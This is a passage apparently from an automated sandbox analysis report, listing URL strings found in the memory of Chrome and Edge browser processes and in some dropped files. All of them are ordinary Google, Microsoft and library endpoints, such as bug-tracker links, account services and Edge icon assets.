          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1554280885.000078240221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
          Source: chrome.exe, 0000000A.00000002.1563015930.0000782402844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
          Source: chrome.exe, 0000000A.00000002.1554632085.0000782402293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
          Source: chrome.exe, 0000000A.00000003.1485843062.00007824030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486113020.00007824030FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486179289.000078240320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485926648.00007824031B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
          Source: chrome.exe, 0000000A.00000003.1487204067.0000782402B80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566268797.0000782402EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487803754.000078240340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487226065.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485843062.00007824030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485959965.0000782403240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487524446.00007824026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564776046.0000782402B4B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487281895.0000782403150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486113020.00007824030FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486179289.000078240320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485926648.00007824031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487185901.0000782402E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
          Source: chrome.exe, 0000000A.00000003.1487204067.0000782402B80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566268797.0000782402EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487803754.000078240340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487226065.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485843062.00007824030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485959965.0000782403240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487524446.00007824026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564776046.0000782402B4B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487281895.0000782403150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486113020.00007824030FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486179289.000078240320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485926648.00007824031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487185901.0000782402E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
          Source: chrome.exe, 0000000A.00000003.1487204067.0000782402B80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566268797.0000782402EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487803754.000078240340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487226065.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485843062.00007824030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485959965.0000782403240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487524446.00007824026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564776046.0000782402B4B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487281895.0000782403150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486113020.00007824030FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486179289.000078240320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485926648.00007824031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487185901.0000782402E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
          Source: chrome.exe, 0000000A.00000003.1487204067.0000782402B80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566268797.0000782402EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487803754.000078240340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487226065.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485843062.00007824030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485959965.0000782403240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487524446.00007824026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564776046.0000782402B4B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487281895.0000782403150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486113020.00007824030FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486179289.000078240320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485926648.00007824031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487185901.0000782402E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
          Source: chrome.exe, 0000000A.00000002.1566929461.000078240304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
          Source: chrome.exe, 0000000A.00000002.1565010392.0000782402BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
          Source: chrome.exe, 0000000A.00000002.1564776046.0000782402B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
          Source: chrome.exe, 0000000A.00000002.1564924959.0000782402B94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
          Source: chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmp, VKXB16.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
          Source: chrome.exe, 0000000A.00000002.1554632085.0000782402278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
          Source: chrome.exe, 0000000A.00000002.1554632085.0000782402278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGetx$
          Source: chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1561855963.00007824025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565810314.0000782402DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
          Source: chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com$x
          Source: chrome.exe, 0000000A.00000002.1554280885.000078240221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565810314.0000782402DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
          Source: chrome.exe, 0000000A.00000003.1526960833.0000782402494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
          Source: chrome.exe, 0000000A.00000003.1526960833.0000782402494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
          Source: chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
